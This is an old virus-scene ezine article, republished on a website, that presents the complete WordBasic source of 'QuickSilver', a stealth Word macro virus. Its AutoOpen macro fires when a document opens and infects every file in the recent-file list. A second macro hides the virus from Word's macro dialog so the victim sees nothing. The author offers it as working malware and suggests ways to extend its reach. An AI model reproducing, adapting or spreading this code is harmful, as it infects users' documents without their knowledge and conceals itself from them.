Copy Link
Add to Bookmark
Report

SLAM2.030: Full-Stealth WordMacro Virus QuickSilver by NJ [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

[ WordMacro. QuickSilver ]-------------- 

˛ VIRUSNAME: QuickSilver
˛ SIZE: 1032 Bytes
˛ ORIGIN: Germany
˛ AUTHOR: Nightmare Joker

->Polymorf No
->Stealth Yes
->Encrypted Yes
->Retro No
-----------------------------------------


Here is it! My new full-stealth macro virus QuickSilver.

If the virus become active, it search's the name of the actually ToolsMacro menu, and infect then all files in the FileList.
If someone try to look in the ToolsMacro Box to see if he maybe infected with a virus, then will QuickSilver immediately open a new document to hide his macros. The user will see NOTHING!
Btw, it works with every Word Version.

------------------------------------------------------------------------- 

MACRO: AutoOpen
~~~~~~~~~~~~~~~
Sub MAIN

REM Set ScreenUpdating Off and DisableInput On
ScreenUpdating : DisableInput

REM s1$ = e.g. "&Tools" (english version of word)
s1$ = MenuText$(0, 6)

REM and s2$ = e.g. "&Macro..." (english version of word)
s2$ = MenuItemText$(s1$, 0, 13)

REM Remove now some characters, which we don't need. ("&" and ".")
s3$ = s1$ + s2$
For i = 1 To Len(s3$)
s4$ = Mid$(s3$, i, 1)
If s4$ <> "&" And s4$ <> "." Then
s5$ = s5$ + s4$
End If
Next i

REM Use now the right name and save it!
s6$ = GetDocumentVar$("Steahlt")
If s5$ = s6$ Then Goto Continue
ToolsMacro .Name = s6$, .Show = 3, .NewName = s5$, .Rename
SetDocumentVar "Steahlt", s5$

REM Start the Quicksilver macro,
REM set ScreenUpdating On and DisableInput Off.
Continue:
QuickSilver
ScreenUpdating : DisableInput 0
End Sub

-------------------------------------------------------------------------

MACRO: QuickSilver
~~~~~~~~~~~~~~~~~~
Sub MAIN

REM Set DisableAutoMacros On
DisableAutoMacros

REM Open now every file in the file list
REM and check if it's allready infected.
Steahlt$ = GetDocumentVar$("Steahlt")
Quick$ = FileName$()
For x = 1 To CountFiles()
If Files$(FileName$(x)) <> "" Then
FileList x
Silver$ = FileName$()
If Quick$ <> Silver$ Then
Check$ = GetDocumentVar$("RAVE")
If Check$ = "" Then

REM If the active file isn't allready infected then
REM save it as a template and copy the virus macros
REM to it!
FileSaveAs .Format = 1
MacroCopy Quick$ + ":AutoOpen", Silver$ + ":", 1
MacroCopy Quick$ + ":QuickSilver", Silver$ + ":", 1
MacroCopy Quick$ + ":" + Steahlt$, Silver$ + ":", 1

REM Save the name of the >> Steahlt Box <<, too.
SetDocumentVar "RAVE", Str$(Rnd())
SetDocumentVar "Steahlt", Steahlt$
End If

REM At last save and close the file.
FileClose 1
End If
End If
Next x

REM Set DisableAutoMacros Off
DisableAutoMacros 0
REM #######################################
REM ############ QUICKSILVER ##############
REM ################ BY ###################
REM ########## NIGHTMARE JOKER ############
REM ############## (SLAM) #################
REM #######################################
End Sub

-------------------------------------------------------------------------

MACRO: >> Steahlt Box <<
~~~~~~~~~~~~~~~~~~~~~~~~
Sub MAIN

REM Set ErrorHandler
On Error Resume Next

REM Set ScreenUpdating Off
ScreenUpdating

REM Create a new file to hide the infected document.
FileNew

REM Create the Box!
Dim dlg As ToolsMacro
GetCurValues dlg
Dialog dlg

REM Close the empty file.
FileClose 2

REM Set ScreenUpdating On
ScreenUpdating

REM And now show the user the >> clean << Box! :)
ToolsMacro dlg
End Sub

REM BTW, this full-stealth method works only with Direct Action macro
REM viruses! If you want infect the global file normal.dot too then use
REM Virtual Boy's full-stealth routine! :)

-------------------------------------------------------------------------


- Nightmare Joker -

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT